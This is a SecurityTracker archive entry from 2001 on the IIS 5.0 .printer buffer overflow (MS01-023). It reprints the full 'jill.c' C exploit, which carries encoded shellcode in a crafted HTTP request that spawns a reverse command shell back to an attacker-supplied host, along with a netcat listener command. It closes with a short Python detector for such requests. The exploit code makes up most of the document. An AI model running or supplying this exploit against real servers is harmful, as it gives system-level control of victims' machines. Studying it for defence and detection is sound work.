SecurityTracker
Archives
Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server
Vendors:   Microsoft
(Another Exploit Released) Re: Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server
SecurityTracker Alert ID:  1001470
SecurityTracker URL:  http://securitytracker.com/id/1001470
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 3 2001
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): Microsoft Windows 2000 Internet Information Services 5.0, Microsoft Windows 2000 Internet Information Services 5.0 + Service Pack 1
Description:   eEye Digital Security reported a vulnerability in the Windows 2000 version of Internet Information Server 5.0. The security hole lets remote users execute arbitrary code on the server in the "system" context, which could allow the remote user to obtain system level access on the server.

Another exploit has been released. See the Source Message for the source code.

Impact:   A remote user could cause the IIS web server to execute arbitrary code in the "system" context, which could allow the remote user to obtain system level access on the server (i.e., take complete control of the server).
Solution:   The vendor has released a fix and strongly recommends that all customers with affected servers apply the patch. See the Vendor URL for patch information.
Vendor URL:  www.microsoft.com/technet/security/bulletin/ms01-023.asp
Cause:   Boundary error
Underlying OS:  Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
May 1 2001 Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server



Source Message Contents

Subject:  IIS 5 remote exploit.


Here's an exploit for the IIS 5 hole.. will give you a remote command shell,
reverse telnet style.

We've only had a chance to test this on a couple of hosts, it should work
fine - if not, drop me a mail and I'll see what I can do to remedy the
situation.

Read the comments for more info.

dark spyrit/beavuh.

/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
 *
 *  by: dark spyrit <dspyrit@beavuh.org>
 *
 *  respect to eeye for finding this one - nice work.
 *  shouts to halvar, neofight and the beavuh bitchez.
 *
 *  this exploit overwrites an exception frame to control eip and get to
 *  our code.. the code then locates the pointer to our larger buffer and
 *  execs.
 *
 *  usage: jill <victim host> <victim port> <attacker host> <attacker port>
 *
 *  the shellcode spawns a reverse cmd shell.. so you need to set up a
 *  netcat listener on the host you control.
 *
 *  Ex: nc -l -p <attacker port> -vv
 *
 *  I haven't slept in years.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

int main(int argc, char *argv[]){

/* the whole request rolled into one, pretty huh? carez. */

unsigned char sploit[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";

        int                     s;
        unsigned short int      a_port;
        unsigned long           a_host;
        struct hostent          *ht;
        struct sockaddr_in      sin;

        printf("iis5 remote .printer overflow.\n"
                "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");

        if (argc != 5){
                printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
                exit(1);
        }

        if ((ht = gethostbyname(argv[1])) == 0){
                herror(argv[1]);
                exit(1);
        }

        sin.sin_port = htons(atoi(argv[2]));
        a_port = htons(atoi(argv[4]));
        a_port ^= 0x9595;

        sin.sin_family = AF_INET;
        sin.sin_addr = *((struct in_addr *)ht->h_addr);

        if ((ht = gethostbyname(argv[3])) == 0){
                herror(argv[3]);
                exit(1);
        }

        a_host = *((unsigned long *)ht->h_addr);
        a_host ^= 0x95959595;

        sploit[441] = (a_port) & 0xff;
        sploit[442] = (a_port >> 8) & 0xff;

        sploit[446] = (a_host) & 0xff;
        sploit[447] = (a_host >> 8) & 0xff;
        sploit[448] = (a_host >> 16) & 0xff;
        sploit[449] = (a_host >> 24) & 0xff;

        if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                perror("socket");
                exit(1);
        }

        printf("\nconnecting... \n");

        if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
                perror("connect");
                exit(1);
        }

        /* sploit is unsigned char; cast keeps strlen() happy with modern compilers */
        write(s, sploit, strlen((char *)sploit));
        sleep (1);
        close (s);

        printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
        exit(0);
}
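A defender-side counterpart to the request built in jill.c, added here as an example (it is not part of the original post, of eEye's advisory or of any Microsoft tooling): it parses a raw HTTP request and flags the shape the exploit relies on, a request for a .printer URL whose header values are either far longer than a hostname or mostly non-printable. The 256-byte ceiling, the 0.9 printable ratio and the two sample requests are assumptions constructed for this example.

```python
import re

# Assumed thresholds for this example (not values taken from the advisory).
MAX_HEADER_VALUE = 256      # longest Host:/other header value we tolerate
MIN_PRINTABLE = 0.9         # below this share of printable bytes: "binary"
PRINTER_RE = re.compile(rb"\.printer(\?|$)", re.IGNORECASE)

def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, target, [(name, value)])."""
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = re.split(rb"\r?\n", head)
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        return None, None, []
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return parts[0], parts[1], headers

def printable_ratio(value):
    if not value:
        return 1.0
    return sum(0x20 <= b < 0x7f for b in value) / len(value)

def inspect_request(raw):
    """Map header name -> reasons for requests aimed at the .printer ISAPI
    extension; an empty dict means nothing matched the overflow pattern."""
    _, target, headers = parse_request(raw)
    findings = {}
    if target is None or not PRINTER_RE.search(target):
        return findings         # only .printer requests reach the vulnerable code
    for name, value in headers:
        reasons = []
        if len(value) > MAX_HEADER_VALUE:
            reasons.append("oversized")
        if printable_ratio(value) < MIN_PRINTABLE:
            reasons.append("binary")
        if reasons:
            findings[name.decode("latin-1")] = reasons
    return findings

# Constructed samples: same request shape as jill.c, padding only, no shellcode.
SAMPLE_ATTACK = (b"GET /NULL.printer HTTP/1.0\r\nBeavuh: " + b"\x90" * 20
                 + b"\r\nHost: " + b"A" * 300 + b"\r\n\r\n")
SAMPLE_BENIGN = b"GET /default.printer HTTP/1.0\r\nHost: intranet.example\r\n\r\n"

if __name__ == "__main__":
    print(inspect_request(SAMPLE_ATTACK))   # {'beavuh': ['binary'], 'host': ['oversized']}
    print(inspect_request(SAMPLE_BENIGN))   # {}
```

Feeding captured request heads (or the request line plus headers from a reverse proxy log) through inspect_request gives a cheap first-pass alert; the same server is still vulnerable until the MS01-023 patch is applied.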

